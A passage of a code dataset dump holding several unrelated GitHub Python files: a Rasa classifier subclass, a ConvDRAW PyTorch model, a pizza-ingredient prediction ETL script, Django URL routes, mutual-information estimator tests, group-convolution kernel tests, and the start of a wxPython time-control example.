ddec_options,\n }\n },\n 'zeopp': {\n 'parameters': zeopp_params,\n 'code': zeopp_code,\n 'metadata': {\n 'options': zeopp_options,\n }\n }\n }\n\n run(ZeoppMultistageDdecWorkChain, **inputs)\n\n\nif __name__ == '__main__':\n main() # pylint: disable=no-value-for-parameter\n","repo_name":"mbercx/aiida-lsmo","sub_path":"examples/run_ZeoppMultistageDdecWorkChain_H2O.py","file_name":"run_ZeoppMultistageDdecWorkChain_H2O.py","file_ext":"py","file_size_in_byte":3290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"40"} +{"seq_id":"39261368613","text":"import rasa.utils.common as common_utils\nfrom rasa.nlu.classifiers.diet_classifier import DIETClassifier\nfrom rasa.constants import DOCS_URL_TRAINING_DATA_NLU\nfrom rasa.nlu.training_data import TrainingData\nfrom rasa.nlu.constants import (\n ENTITIES,\n TOKENS_NAMES,\n TEXT,\n ENTITY_ATTRIBUTE_START,\n ENTITY_ATTRIBUTE_END,\n INTENT,\n)\n\n\nclass DIETClassifierCustom(DIETClassifier):\n @staticmethod\n def check_correct_entity_annotations(training_data: TrainingData) -> None:\n \"\"\"Check if entities are correctly annotated in the training data.\n If the start and end values of an entity do not match any start and end values\n of the respected token, we define an entity as misaligned and log a warning.\n Args:\n training_data: The training data.\n \"\"\"\n for example in training_data.entity_examples:\n entity_boundaries = [\n (entity[ENTITY_ATTRIBUTE_START], entity[ENTITY_ATTRIBUTE_END])\n for entity in example.get(ENTITIES)\n ]\n token_start_positions = [\n t.start for t in example.get(TOKENS_NAMES[TEXT], [])\n ]\n token_end_positions = [t.end for t in example.get(TOKENS_NAMES[TEXT], [])]\n\n for entity_start, entity_end in entity_boundaries:\n if (\n entity_start not in token_start_positions\n or entity_end not in token_end_positions\n ):\n common_utils.raise_warning(\n f\"Misaligned entity annotation in message '{example.text}' \"\n f\"with intent '{example.get(INTENT)}'. Make sure the start and \"\n f\"end values of entities in the training data match the token \"\n f\"boundaries (e.g. entities don't include trailing whitespaces \"\n f\"or punctuation).\",\n docs=DOCS_URL_TRAINING_DATA_NLU,\n )\n break\n","repo_name":"weni-ai/bothub-nlp","sub_path":"bothub/shared/utils/pipeline_components/diet_classifier.py","file_name":"diet_classifier.py","file_ext":"py","file_size_in_byte":2029,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"40"} +{"seq_id":"20430220049","text":"import torch\nfrom torch import nn\nfrom torch.distributions import Normal, kl_divergence\n\nfrom .conv_lstm import Conv2dLSTMCell\n\nuse_gpu = torch.cuda.is_available()\ndevice = torch.device('cuda' if use_gpu else 'cpu')\n\n\nclass ConvDraw(nn.Module):\n \"\"\"\n Towards Conceptual Compression\n - https://arxiv.org/pdf/1604.08772.pdf\n \"\"\"\n\n def __init__(self,\n xdim,\n height,\n width,\n hdim,\n zdim,\n read_size=5,\n write_size=5,\n glimpse=10,\n *args,\n **kwargs):\n super(ConvDraw, self).__init__()\n self.xdim = xdim\n self.hdim = hdim\n self.zdim = zdim\n\n self.T = glimpse\n\n self.encoder = Conv2dLSTMCell(xdim + xdim + hdim, hdim, read_size)\n self.decoder = Conv2dLSTMCell(zdim + xdim, hdim, write_size)\n\n self.prior = nn.Conv2d(hdim,\n zdim * 2,\n kernel_size=5,\n stride=1,\n padding=2)\n self.posterior = nn.Conv2d(hdim,\n zdim * 2,\n kernel_size=5,\n stride=1,\n padding=2)\n\n self.upsampler = nn.Conv2d(hdim, xdim, kernel_size=1, stride=1)\n\n self.init_weights()\n\n def init_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight,\n mode='fan_out',\n nonlinearity='relu')\n if hasattr(m.weight, 'bias') and m.weight.bias is not None:\n nn.init.constant_(m.weight.bias, 0)\n\n def forward(self, x):\n hdim, T = self.hdim, self.T\n batch, d, h, w = x.shape\n\n canvas = x.new_zeros((batch, d, h, w))\n\n c_enc = x.new_zeros((batch, hdim, h, w))\n h_enc = x.new_zeros((batch, hdim, h, w))\n\n c_dec = x.new_zeros((batch, hdim, h, w))\n h_dec = x.new_zeros((batch, hdim, h, w))\n\n kl = 0\n for t in range(T):\n eps = x - torch.sigmoid(canvas)\n\n c_enc, h_enc = self.encoder(torch.cat([x, eps, h_dec], dim=1),\n (c_enc, h_enc))\n\n # Prior\n p_mu, p_logvar = torch.chunk(self.prior(h_dec), 2, dim=1)\n p = Normal(p_mu, p_logvar.mul(0.5).exp())\n\n # Posterior\n q_mu, q_logvar = torch.chunk(self.posterior(h_enc), 2, dim=1)\n q = Normal(q_mu, q_logvar.mul(0.5).exp())\n\n # Sample\n z = q.rsample()\n\n c_dec, h_dec = self.decoder(torch.cat([z, canvas], dim=1),\n (c_dec, h_dec))\n\n current = self.upsampler(h_dec)\n canvas = canvas + current\n kl += kl_divergence(q, p)\n\n kl = torch.mean(torch.sum(kl, dim=[1, 2, 3]))\n\n return torch.sigmoid(canvas.view(x.shape)), kl\n","repo_name":"jihoonl/VAEs","sub_path":"models/conv_draw.py","file_name":"conv_draw.py","file_ext":"py","file_size_in_byte":3118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"31757877304","text":"import pandas as pd\nimport re\nimport os\nimport requests\nimport plotly.graph_objects as go\n\nfrom calidad_datos import main as analisis\nfrom transformacion_datos import etl as transformar\nfrom xml.etree.ElementTree import Element, ElementTree, SubElement\nfrom reporte import crear_presentacion\nfrom plantilla_excel import make_excel\n\n\nERROR = 4\n\n\ndef df_to_dict(dicc):\n\n tmp = {}\n\n for clave in dicc['Nº esperado'].keys():\n\n ingrediente = dicc['Ingrediente'][clave]\n\n ingrediente = re.sub(' ', '_', ingrediente)\n\n if ingrediente == '‘Nduja_Salami':\n ingrediente = 'Nduja_Salami'\n\n tmp[ingrediente] = dicc['Nº esperado'][clave]\n\n return tmp\n\n\ndef dict_to_xml(tag, d):\n\n elem = Element(tag)\n\n pedidos = SubElement(elem, 'Pedidos')\n\n ingredientes = SubElement(elem, 'Ingredientes')\n\n for key, val in d.items():\n\n if key != 'Pedidos':\n\n child = SubElement(ingredientes, 'Ingrediente', name=key, cantidad=str(val))\n\n else:\n\n child = SubElement(pedidos, 'Pedidos', cantidad=str(val))\n\n return elem\n\n\ndef crear_imagen(imag_name, x, y, color=None, customscale=None):\n\n fig = go.Figure()\n if customscale is not None:\n fig.add_trace(go.Bar(x=x, y=y, marker=dict(color=color, colorscale=customscale)))\n\n elif color is not None:\n fig.add_trace(go.Bar(x=x, y=y, marker=dict(color=color)))\n\n else:\n fig.add_trace(go.Bar(x=x, y=y))\n\n fig.write_image(f\"imagenes/{imag_name}\")\n\n\ndef crear_imagenes(df_ingredientes: pd.DataFrame, df_pizzas: pd.DataFrame, dicc: dict):\n\n contador = False\n for file in os.scandir('./'):\n if file.name == 'imagenes' and not contador:\n contador = True\n logo = False\n\n if not contador:\n os.mkdir('imagenes')\n\n for imagen in os.scandir('./imagenes/'):\n if imagen.name == 'logo.png' and not logo:\n logo = True\n\n if not logo:\n imagen = requests.get('https://img1.wsimg.com/isteam/ip/5a78177b-0605-4ae4-9d2a-c96dfa5cccbd/logo/9609391e-6d81-4d26-8a42-0d9aa201a919.jpg/:/rs=h:160/qt=q:95.png')\n code = open('./imagenes/logo.png', 'wb')\n code.write(imagen.content)\n\n dicc_sem = df_ingredientes.to_dict()\n\n ingredientes = []\n cantidades = []\n i = 0\n for value in dicc_sem.values():\n if not i:\n for value2 in value.values():\n i += 1\n if i > 1:\n ingredientes.append(value2)\n else:\n for value2 in value.values():\n cantidades.append(value2)\n\n cantidades.pop(0)\n\n crear_imagen('ingredientes.png', x=ingredientes, y=cantidades)\n\n dicc_sem1 = df_pizzas[['pizza_type_id', 'Pedidos']].to_dict()\n\n pizzas = []\n pedidos = []\n\n for i in range(len(dicc_sem1['Pedidos']) - 1):\n\n pizzas.append(dicc_sem1['pizza_type_id'][i])\n pedidos.append(dicc_sem1['Pedidos'][i])\n\n crear_imagen('tipo_pedidos.png', x=pizzas, y=cantidades)\n\n maximo = [0]*5\n mayores = [0]*5\n\n minimo = [10000]*5\n menores = [0]*5\n\n for i in range(len(dicc_sem1['Pedidos']) - 1):\n\n cantidad = dicc_sem1['Pedidos'][i]\n pizza = dicc_sem1['pizza_type_id'][i]\n\n for max in range(5):\n\n if maximo[max] < cantidad and pizza not in mayores:\n\n maximo[max] = cantidad\n mayores[max] = pizza\n\n for min in range(5):\n\n if minimo[min] > cantidad and pizza not in menores:\n\n minimo[min] = cantidad\n menores[min] = pizza\n\n z1 = [max for max in maximo]\n z2 = [min for min in minimo]\n\n customscale = [\n [0, \"rgb(128, 64, 0)\"],\n [0.1, \"rgb(205, 127, 50)\"],\n [0.25, \"rgb (128,128,128)\"],\n [1.0, \"rgb(255, 215, 0)\"]\n ]\n\n crear_imagen('mejores_pizzas.png', x=mayores, y=maximo, color=z1, customscale=customscale)\n\n crear_imagen('peores_pizzas.png', x=menores, y=minimo, color=z2, customscale=customscale)\n\n ficheros = []\n valores = []\n for value in dicc.values():\n valor = 0\n for value2 in value['Contenidos'].values():\n valor += int(value2['Valores_Null_Nan'])\n\n ficheros.append(value['Nombre_fichero'])\n valores.append(valor)\n\n crear_imagen('analisis_datos.png', x=ficheros, y=valores, color='red')\n\n return\n\n\ndef aproximar_numero(numero: float):\n '''\n Aproxima un número, añadiéndole un margen de error\n '''\n\n global ERROR\n\n return int(round(numero) + ERROR)\n\n\ndef extract(semana: int):\n '''\n Recoge los datos del csv correspondiente a esa semana.\n sino, llamará a la anterior ETL\n '''\n\n nombre_csv = 'csv_procesado_semana' + str(semana) + '.csv'\n\n # Lo primero será ver si existe el archivo\n try:\n\n return pd.read_csv(f'./datasets/{nombre_csv}')\n\n # Sino, nos tocará extraer los datos de la otra ETL\n except FileNotFoundError:\n\n try:\n\n dataframe = transformar(semana)\n\n return dataframe\n\n except Exception as ex:\n\n print(f'Fallo causado por la excepcion {ex}')\n\n return False\n\n\ndef transform(dataframe: pd.DataFrame):\n '''\n Dividimos el dataframe por semanas\n '''\n\n if isinstance(dataframe, pd.DataFrame):\n\n df_ingredientes = dataframe.tail(1)\n\n df_ingredientes.pop('pizza_type_id')\n df_ingredientes.pop('size')\n\n df_ingredientes = df_ingredientes.apply(aproximar_numero)\n\n df_ingredientes = pd.DataFrame(df_ingredientes)\n df_ingredientes = df_ingredientes.rename(columns={'Unnamed: 0': 'Ingrediente', 0: 'Nº esperado'})\n\n return df_ingredientes, dataframe\n\n else:\n\n return False\n\n\ndef load(df: pd.DataFrame, df_pedidos: pd.DataFrame, dicc: dict, nombre: str):\n '''\n Guardaremos los ingredientes a comprar en un csv\n De igual manera, los imprimiremos por pantalla\n '''\n if isinstance(df, pd.DataFrame):\n\n conclusiones = False\n for file in os.scandir('./'):\n\n if file.name == 'conclusiones' and not conclusiones:\n conclusiones = True\n\n if not conclusiones:\n\n os.mkdir('conclusiones')\n\n df.to_csv(f'./conclusiones/{nombre}.csv')\n\n make_excel(df_pedidos, df, nombre)\n\n print(df)\n mensaje = f'Para más informacion, vaya a los siguientes archivos: '\n mensaje += f'{nombre}.csv, {nombre}.xlm, {nombre}.pdf, {nombre}.xlsx'\n print(mensaje)\n\n df = pd.read_csv(f'./conclusiones/{nombre}.csv')\n df = df.rename(columns={'Unnamed: 0': 'Ingrediente'})\n tmp = df.to_dict()\n\n tmp = df_to_dict(tmp)\n\n archivo = dict_to_xml(\n 'Semana_' +\n re.sub('ingredientes_semana', '', nombre), tmp)\n\n ElementTree(archivo).write(f'./conclusiones/{nombre}.xml')\n\n crear_imagenes(df, df_pedidos, dicc)\n\n crear_presentacion(nombre, re.search('\\d+', nombre).group())\n\n return df\n\n else:\n return False\n\n\ndef main(semana=-1):\n '''\n Ejecuta todo el programa en el siguiente orden:\n 1) Hace un análisis de los datos > analisis_datos.txt\n 2) Extrae los datos de otra ETL, que filtra los datos segun los meses\n indicados, guardando los pedidos (pizzas e ingredientes) en ese periodo\n 3) Realiza un prediccion para ese mismo mes, semana por semana\n '''\n dicc = analisis()\n\n while 52 <= semana or semana < 0:\n try:\n semana = int(input('Inserte numero de semana del año: '))\n\n except ValueError:\n semana = -1\n\n nombre = 'ingredientes_semana' + str(semana)\n\n return load(*transform(extract(semana)), dicc, nombre)\n\n\nif __name__ == '__main__':\n\n main()\n","repo_name":"Pere-03/Maven_pizza_2016","sub_path":"predictions.py","file_name":"predictions.py","file_ext":"py","file_size_in_byte":7793,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33351570429","text":"from django.conf.urls import url\nfrom main import views\n\nurlpatterns = [\n url(r'^serve/journal/list/$', views.serve_journal_list),\n url(r'^store/name/and/number/$', views.store_name_and_number),\n url(r'^serve/purpose/of/trees/$', views.serve_purpose_of_trees),\n url(r'^store/subscriber/$', views.store_subscriber),\n url(r'^get/user/type/$', views.get_user_type),\n url(r'^update/need/pdf/$', views.update_need_pdf),\n url(r'^get/user/detail/$', views.get_user_detail),\n url(r'^login/$', views.login),\n url(r'^serve/subscribers/list/$', views.serve_subscribers_list),\n url(r'^logout/$', views.logout),\n url(r'^store/email/$', views.store_email),\n # url(r'^/update/profile/$', views.update_profile),\n url(r'^serve/profile/data/$', views.serve_profile_data),\n url(r'^$', views.admin_login),\n url(r'^register/user/$', views.register_user),\n url(r'^update_user/$', views.update_user),\n url(r'^update_user_profile$', views.update_user_profile),\n url(r'^new/journal/$', views.new_journal),\n url(r'^remove_journal/$', views.remove_journal),\n url(r'^update/status/active/$', views.update_status_active),\n url(r'^update/status/inactive/$', views.update_status_inactive),\n url(r'^print/labels/$', views.print_labels),\n \n \n]\n","repo_name":"Ruban14/CDP-Journal-admin","sub_path":"main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"15388151306","text":"from copy import deepcopy\nfrom typing import Tuple, Dict, Type, Any\n\nimport numpy as np\nimport torch\nfrom torch.optim import Optimizer, Adam\nfrom pyro.distributions.transforms import conditional_affine_coupling\nfrom torch.utils.data import DataLoader\n\nfrom torch_mist.data.multivariate import JointMultivariateNormal\nfrom torch_mist.distributions import conditional_transformed_normal\nfrom torch_mist.distributions.normal import ConditionalStandardNormalModule\nfrom torch_mist.distributions.transforms import (\n ConditionalTransformedDistributionModule,\n permute,\n)\nfrom torch_mist.estimators import (\n MIEstimator,\n instantiate_estimator,\n CLUB,\n BA,\n MultiMIEstimator,\n js,\n flip_estimator,\n doe,\n nwj,\n pq,\n)\nfrom torch_mist.estimators.discriminative import DiscriminativeMIEstimator\nfrom torch_mist.estimators.hybrid import (\n ResampledHybridMIEstimator,\n ReweighedHybridMIEstimator,\n PQHybridMIEstimator,\n)\nfrom torch_mist.quantization import (\n FixedQuantization,\n vqvae_quantization,\n kmeans_quantization,\n)\nfrom torch_mist.utils.data import DistributionDataLoader, SampleDataset\n\nfrom torch_mist.utils.evaluation import evaluate_mi\nfrom torch_mist.utils.train.mi_estimator import train_mi_estimator\n\n\nrho = 0.9\nx_dim = y_dim = 1\nbatch_size = 64\nn_bins = 32\nneg_samples = 16\nmax_epochs = 1\n\noptimizer_params = {\"lr\": 1e-3}\noptimizer_class = Adam\nn_train_samples = 100000\nn_test_samples = 10000\nn_pretrain_epochs = 3\nhidden_dims = [64]\noutput_dim = 64\nquantization_dim = 4\natol = 1e-1\n\n\ndef _make_data() -> (\n Tuple[\n Dict[str, torch.Tensor],\n Dict[str, torch.Tensor],\n torch.Tensor,\n torch.Tensor,\n ]\n):\n p_xy = JointMultivariateNormal(sigma=1, rho=rho, n_dim=1)\n true_mi = p_xy.mutual_information()\n entropy_y = p_xy.entropy(\"y\")\n\n train_samples = p_xy.sample([n_train_samples])\n test_samples = p_xy.sample([n_test_samples])\n\n return train_samples, test_samples, true_mi, entropy_y\n\n\ndef _test_estimator(\n estimator: MIEstimator,\n train_samples: Dict[str, torch.Tensor],\n test_samples: Dict[str, torch.Tensor],\n true_mi: torch.Tensor,\n optimizer_params: Dict[str, Any],\n optimizer_class: Type[Optimizer],\n atol: float = 1e-1,\n):\n # Train the estimator\n train_mi_estimator(\n estimator=estimator,\n x=train_samples[\"x\"],\n y=train_samples[\"y\"],\n optimizer_params=optimizer_params,\n optimizer_class=optimizer_class,\n max_epochs=max_epochs,\n lr_annealing=False,\n batch_size=batch_size,\n verbose=False,\n )\n\n # Compute the estimate\n mi_estimate = evaluate_mi(\n estimator,\n x=test_samples[\"x\"],\n y=test_samples[\"y\"],\n batch_size=batch_size,\n )\n\n print(\"True I(x;y): \", true_mi)\n print(\"Estimated I(x;y): \", mi_estimate)\n\n # Check that the estimate is close to the true value\n assert np.isclose(\n mi_estimate, true_mi, atol=atol\n ), f\"Estimate {mi_estimate} is not close to true value {true_mi}.\"\n\n\ndef test_discriminative_estimators():\n # Seed everything\n np.random.seed(0)\n torch.manual_seed(0)\n\n train_samples, test_samples, true_mi, _ = _make_data()\n\n estimators = [\n instantiate_estimator(\n estimator_name=\"nwj\",\n x_dim=x_dim,\n y_dim=y_dim,\n hidden_dims=hidden_dims,\n neg_samples=neg_samples,\n ),\n flip_estimator(\n instantiate_estimator(\n estimator_name=\"nwj\",\n x_dim=x_dim,\n y_dim=y_dim,\n hidden_dims=hidden_dims,\n neg_samples=neg_samples,\n )\n ),\n instantiate_estimator(\n estimator_name=\"infonce\",\n x_dim=x_dim,\n y_dim=y_dim,\n hidden_dims=hidden_dims,\n output_dim=output_dim,\n projection_head=\"symmetric\",\n ),\n instantiate_estimator(\n estimator_name=\"infonce\",\n x_dim=x_dim,\n y_dim=y_dim,\n hidden_dims=hidden_dims,\n output_dim=output_dim,\n ),\n instantiate_estimator(\n estimator_name=\"js\",\n x_dim=x_dim,\n y_dim=y_dim,\n hidden_dims=hidden_dims,\n neg_samples=neg_samples,\n ),\n instantiate_estimator(\n estimator_name=\"js\",\n x_dim=x_dim,\n y_dim=y_dim,\n hidden_dims=hidden_dims,\n neg_samples=neg_samples,\n critic_type=\"separable\",\n output_dim=output_dim,\n ),\n instantiate_estimator(\n estimator_name=\"mine\",\n x_dim=x_dim,\n y_dim=y_dim,\n hidden_dims=hidden_dims,\n neg_samples=neg_samples,\n ),\n instantiate_estimator(\n estimator_name=\"smile\",\n x_dim=x_dim,\n y_dim=y_dim,\n hidden_dims=hidden_dims,\n neg_samples=neg_samples,\n ),\n instantiate_estimator(\n estimator_name=\"tuba\",\n x_dim=x_dim,\n y_dim=y_dim,\n hidden_dims=hidden_dims,\n neg_samples=neg_samples,\n ),\n instantiate_estimator(\n estimator_name=\"alpha_tuba\",\n x_dim=x_dim,\n y_dim=y_dim,\n hidden_dims=hidden_dims,\n neg_samples=neg_samples,\n ),\n instantiate_estimator(\n estimator_name=\"alpha_tuba\",\n x_dim=x_dim,\n y_dim=y_dim,\n hidden_dims=hidden_dims,\n neg_samples=neg_samples,\n learnable_baseline=False,\n ),\n instantiate_estimator(\n estimator_name=\"flo\",\n x_dim=x_dim,\n y_dim=y_dim,\n hidden_dims=hidden_dims,\n neg_samples=neg_samples,\n ),\n ]\n\n for estimator in estimators:\n print(estimator)\n _test_estimator(\n estimator=estimator,\n train_samples=train_samples,\n test_samples=test_samples,\n true_mi=true_mi,\n optimizer_params=optimizer_params,\n optimizer_class=optimizer_class,\n atol=atol,\n )\n\n\ndef test_generative_estimators():\n # Seed everything\n np.random.seed(0)\n torch.manual_seed(0)\n\n train_samples, test_samples, true_mi, entropy_y = _make_data()\n\n estimators = [\n instantiate_estimator(\n estimator_name=\"ba\",\n x_dim=x_dim,\n y_dim=y_dim,\n entropy_y=entropy_y,\n hidden_dims=hidden_dims,\n transform_name=\"conditional_linear\",\n n_transforms=1,\n ),\n instantiate_estimator(\n estimator_name=\"doe\",\n x_dim=x_dim,\n y_dim=y_dim,\n hidden_dims=hidden_dims,\n conditional_transform_name=\"conditional_linear\",\n n_conditional_transforms=1,\n marginal_transform_name=\"linear\",\n n_marginal_transforms=1,\n ),\n instantiate_estimator(\n estimator_name=\"gm\",\n x_dim=x_dim,\n y_dim=y_dim,\n hidden_dims=hidden_dims,\n joint_transform_name=\"spline_autoregressive\",\n n_joint_transforms=2,\n marginal_transform_name=\"linear\",\n n_marginal_transforms=1,\n ),\n instantiate_estimator(\n estimator_name=\"l1out\",\n x_dim=x_dim,\n y_dim=y_dim,\n hidden_dims=hidden_dims,\n transform_name=\"conditional_linear\",\n n_transforms=1,\n ),\n instantiate_estimator(\n estimator_name=\"club\",\n x_dim=x_dim,\n y_dim=y_dim,\n hidden_dims=hidden_dims,\n transform_name=\"conditional_linear\",\n n_transforms=1,\n ),\n ]\n\n for estimator in estimators:\n print(estimator)\n _test_estimator(\n estimator=estimator,\n train_samples=train_samples,\n test_samples=test_samples,\n true_mi=true_mi,\n optimizer_params=optimizer_params,\n optimizer_class=optimizer_class,\n atol=atol if not isinstance(estimator, CLUB) else 10,\n )\n\n\ndef test_quantized_mi_estimators():\n # Seed everything\n np.random.seed(0)\n torch.manual_seed(0)\n\n train_samples, test_samples, true_mi, _ = _make_data()\n\n quantizations = [\n FixedQuantization(\n input_dim=x_dim, thresholds=torch.linspace(-3, 3, n_bins - 1)\n ),\n vqvae_quantization(\n data=train_samples[\"x\"],\n input_dim=x_dim,\n hidden_dims=hidden_dims,\n quantization_dim=quantization_dim,\n n_bins=n_bins,\n max_epochs=n_pretrain_epochs,\n batch_size=batch_size,\n ),\n vqvae_quantization(\n data=train_samples[\"x\"],\n input_dim=x_dim,\n hidden_dims=hidden_dims,\n quantization_dim=quantization_dim,\n n_bins=n_bins,\n batch_size=batch_size,\n beta=0.01,\n ),\n ]\n\n estimators = [\n instantiate_estimator(\n estimator_name=\"pq\",\n x_dim=x_dim,\n hidden_dims=hidden_dims,\n Q_y=quantization,\n )\n for quantization in quantizations\n ]\n estimators += [\n instantiate_estimator(\n estimator_name=\"binned\", Q_x=quantization, Q_y=quantization\n )\n for quantization in quantizations\n ]\n\n for estimator in estimators:\n print(estimator)\n _test_estimator(\n estimator=estimator,\n train_samples=train_samples,\n test_samples=test_samples,\n true_mi=true_mi,\n optimizer_params=optimizer_params,\n optimizer_class=optimizer_class,\n atol=atol,\n )\n\n\ndef test_hybrid_estimators():\n # Seed everything\n np.random.seed(0)\n torch.manual_seed(0)\n\n train_samples, test_samples, true_mi, entropy_y = _make_data()\n q_Y_given_X = conditional_transformed_normal(\n input_dim=y_dim,\n context_dim=x_dim,\n hidden_dims=hidden_dims,\n scale=(1 - rho**2) ** 0.1 + 0.1,\n )\n\n generative_estimator = doe(\n x_dim=x_dim,\n y_dim=y_dim,\n q_Y_given_X=q_Y_given_X,\n marginal_transform_name=\"linear\",\n )\n\n discriminative_estimator = nwj(\n x_dim=x_dim,\n y_dim=y_dim,\n hidden_dims=hidden_dims,\n neg_samples=neg_samples,\n )\n\n pq_estimator = pq(\n x_dim=x_dim,\n Q_y=kmeans_quantization(train_samples[\"y\"], n_bins=n_bins),\n hidden_dims=hidden_dims,\n temperature=1,\n )\n\n estimators = [\n ResampledHybridMIEstimator(\n generative_estimator=deepcopy(generative_estimator),\n discriminative_estimator=deepcopy(discriminative_estimator),\n ),\n ReweighedHybridMIEstimator(\n generative_estimator=deepcopy(generative_estimator),\n discriminative_estimator=deepcopy(discriminative_estimator),\n ),\n PQHybridMIEstimator(\n pq_estimator=pq_estimator,\n discriminative_estimator=deepcopy(discriminative_estimator),\n ),\n ]\n\n for estimator in estimators:\n print(estimator)\n _test_estimator(\n estimator=estimator,\n train_samples=train_samples,\n test_samples=test_samples,\n true_mi=true_mi,\n optimizer_params=optimizer_params,\n optimizer_class=optimizer_class,\n atol=atol,\n )\n\n\ndef test_flow_generative():\n # Seed everything\n np.random.seed(42)\n torch.manual_seed(42)\n\n input_dim = 2\n\n p_xy = JointMultivariateNormal(n_dim=input_dim)\n true_mi = p_xy.mutual_information()\n entropy_y = p_xy.entropy(\"y\")\n\n base = ConditionalStandardNormalModule(input_dim)\n transforms = [\n conditional_affine_coupling(\n input_dim=input_dim, context_dim=input_dim, hidden_dims=hidden_dims\n ),\n permute(input_dim),\n conditional_affine_coupling(\n input_dim=input_dim, context_dim=input_dim, hidden_dims=hidden_dims\n ),\n permute(input_dim),\n conditional_affine_coupling(\n input_dim=input_dim, context_dim=input_dim, hidden_dims=hidden_dims\n ),\n ]\n transformed_dist = ConditionalTransformedDistributionModule(\n base, transforms\n )\n\n estimator = BA(\n q_Y_given_X=transformed_dist,\n entropy_y=entropy_y,\n )\n\n train_loader = DistributionDataLoader(\n joint_dist=p_xy,\n batch_size=64,\n max_samples=100000,\n )\n\n train_mi_estimator(\n estimator,\n train_loader=train_loader,\n max_epochs=5,\n verbose=False,\n )\n\n mi_estimate = evaluate_mi(estimator, dataloader=train_loader)\n\n print(\"True I(x;y): \", true_mi)\n print(\"Estimated I(x;y): \", mi_estimate)\n\n assert np.isclose(\n mi_estimate, true_mi, atol=atol\n ), f\"Estimate {mi_estimate} is not close to true value {true_mi}.\"\n\n\ndef test_multi_estimator():\n train_samples, test_samples, true_mi, entropy_y = _make_data()\n\n # Create a new de-correlated variable\n train_samples[\"z\"] = torch.roll(train_samples[\"x\"], 1, 0)\n test_samples[\"z\"] = torch.roll(test_samples[\"x\"], 1, 0)\n\n train_loader = DataLoader(\n SampleDataset(train_samples), batch_size=batch_size, num_workers=4\n )\n test_loader = DataLoader(\n SampleDataset(test_samples), batch_size=batch_size, num_workers=4\n )\n\n estimator = MultiMIEstimator(\n estimators={\n (\"x\", \"y\"): js(\n x_dim=x_dim,\n y_dim=y_dim,\n hidden_dims=hidden_dims,\n neg_samples=neg_samples,\n ),\n (\"x\", \"z\"): js(\n x_dim=x_dim,\n y_dim=y_dim,\n hidden_dims=hidden_dims,\n neg_samples=neg_samples,\n ),\n }\n )\n\n train_mi_estimator(\n estimator,\n train_loader=train_loader,\n max_epochs=5,\n verbose=False,\n )\n\n mi_estimate = evaluate_mi(estimator, dataloader=test_loader)\n\n assert np.isclose(\n mi_estimate[\"I(x;y)\"], true_mi, atol=atol\n ), f\"Estimate {mi_estimate} is not close to true value {true_mi}.\"\n\n assert np.isclose(\n mi_estimate[\"I(x;z)\"], 0, atol=atol\n ), f\"Estimate {mi_estimate} is not close to true value {0}.\"\n","repo_name":"mfederici/torch-mist","sub_path":"tests/test_estimators.py","file_name":"test_estimators.py","file_ext":"py","file_size_in_byte":14531,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"40"} +{"seq_id":"16594506008","text":"import pytest\nimport numpy as np\nimport tensorflow as tf\nfrom chainer import cuda, Variable\n\nfrom groupy.gconv.gconv_chainer.TransformFilter import TransformGFilter\nfrom groupy.gconv.gconv_tensorflow.transform_kernel import transform_kernel_2d_nhwc\nfrom groupy.gconv.make_gconv_indices import make_c4_z2_indices, make_c4_p4_indices,\\\n make_d4_z2_indices, make_d4_p4m_indices, make_c6_p6_indices,\\\n make_c6_z2_indices, make_d6_p6m_indices, make_d6_z2_indices\n\n\ndef tf_trans_kernel_nhwc(w, inds):\n no, ni, nti, n, _ = w.shape\n nto = inds.shape[0]\n w = w.transpose((2, 3, 4, 1, 0))\n\n wt = tf.constant(w)\n rwt = transform_kernel_2d_nhwc(wt, inds)\n\n with tf.Session() as sess:\n rwt = sess.run(rwt)\n\n rwt = rwt.transpose(3, 2, 0, 1).reshape(no, nto, ni, nti, n, n)\n return rwt\n\n\ndef ch_trans_filter(w, inds):\n w_gpu = cuda.to_gpu(w)\n inds_gpu = cuda.to_gpu(inds)\n\n wv = Variable(w_gpu)\n rwv = TransformGFilter(inds_gpu)(wv)\n\n return cuda.to_cpu(rwv.data)\n\n\n@pytest.mark.parametrize(\"make_indices,nti\", [\n (make_c4_z2_indices, 1),\n (make_d4_z2_indices, 1),\n (make_c6_z2_indices, 1),\n (make_d6_z2_indices, 1),\n (make_c4_p4_indices, 4),\n (make_d4_p4m_indices, 8),\n (make_c6_p6_indices, 6),\n (make_d6_p6m_indices, 12)\n])\n@pytest.mark.parametrize(\"transform\", [tf_trans_kernel_nhwc]) # , tf_trans_kernel_nchw])\n@pytest.mark.parametrize(\"ksize\", [3, 7])\ndef test_transforms(make_indices, nti, transform, ksize):\n inds = make_indices(ksize=ksize)\n\n no, ni = np.random.randint(1, 10, size=2)\n w = np.random.randn(no, ni, nti, ksize, ksize)\n\n rt = transform(w, inds)\n rc = ch_trans_filter(w, inds)\n\n np.testing.assert_array_equal(rt, rc)\n","repo_name":"ehoogeboom/hexaconv","sub_path":"groupy/gconv/gconv_tensorflow/test_transform_kernel.py","file_name":"test_transform_kernel.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"40"} +{"seq_id":"35008255343","text":"import wx\nimport wx.lib.masked as masked\n\n########################################################################\nclass MyPanel(wx.Panel):\n \"\"\"\"\"\"\n\n #----------------------------------------------------------------------\n def __init__(self, parent):\n \"\"\"Constructor\"\"\"\n wx.Panel.__init__(self, parent)\n\n self.mainSizer = wx.BoxSizer(wx.VERTICAL)\n\n text1 = wx.StaticText( self, -1, \"12-hour format:\", size=(150,-1))\n self.time12 = masked.TimeCtrl( self, -1, name=\"12 hour control\" )\n h = self.time12.GetSize().height\n spin1 = wx.SpinButton( self, -1, wx.DefaultPosition, (-1,h), wx.SP_VERTICAL )\n self.time12.BindSpinButton( spin1 )\n self.addWidgets([text1, self.time12, spin1])\n\n text2 = wx.StaticText( self, -1, \"24-hour format:\")\n spin2 = wx.SpinButton( self, -1, 